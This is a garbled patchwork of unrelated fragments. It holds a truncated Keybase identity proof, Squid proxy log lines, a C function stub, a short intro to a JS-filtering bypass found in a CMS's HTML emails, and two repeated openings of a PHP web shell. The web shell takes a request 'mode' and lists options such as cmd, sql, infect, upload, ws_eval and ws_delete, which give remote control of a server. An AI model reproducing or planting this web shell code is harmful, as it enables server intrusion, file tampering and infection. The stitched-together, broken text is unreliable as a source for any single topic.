I hereby claim:
- I am kosborn on github.
- I am kos (https://keybase.io/kos) on keybase.
- I have a public key ASDsNmhV1lARSRRYFpM2u1ytRTx9llez-98OXc1EoQ0zgwo
To claim this, I am signing this object:
1286536308.779 180 192.168.0.224 TCP_MISS/200 411 GET http://liveupdate.symantecliveupdate.com/minitri.flg - DIRECT/125.23.216.203 text/plain
1286536308.910 37 192.168.0.224 TCP_MISS/200 4083 GET http://liveupdate.symantecliveupdate.com/streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip - DIRECT/125.23.216.203 application/zip
1286536309.450 917 192.168.0.227 TCP_MISS/200 20670 GET http://www.youtube.com/watch? - DIRECT/209.85.231.136 text/html
1286536309.549 172 192.168.0.227 TCP_MISS/204 294 GET http://v15.lscache3.c.youtube.com/generate_204? - DIRECT/122.160.120.150 text/html
1286536309.586 921 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tubemogul.co...eiver/services - DIRECT/174.129.41.128 application/xml
1286536309.608 829 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tubemogul.co...eiver/services - DIRECT/174.129.41.128 application/xml
1286536309.660 785 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tube
Bool
senescent_p (void)
{
/* If you are in here because you're planning on disabling this warning
before redistributing my software, please don't.
I sincerely request that you do one of the following:
1: leave this code intact and this warning in place, -OR-
This is kind of a dumb bug, but interesting nonetheless. It was found by Yoni Ramon and myself while testing for vulnerabilities in a CMS at the beginning of 2014. While the particular injection point on the CMS was not vulnerable, we noticed it was sending HTML in emails directly to users. HTML in emails is not really a vulnerability; however, we discovered a JS-filtering bypass that allowed us to inject JS into the client.
The short version is (long version in email below):
<?
@set_time_limit(0);
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down");
$mode = $_REQUEST['mode'];
if (in_array($mode, $modearr)) {
function ws_stripslashes($string) {
if (get_magic_quotes_gpc()) {
return StripSlashes($string);
} else {
return $string;
<?php
@set_time_limit(0);
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down");
$mode = $_REQUEST['mode'];
if (in_array($mode, $modearr)) {
function ws_stripslashes($string) {
if (get_magic_quotes_gpc()) {
return StripSlashes($string);
} else {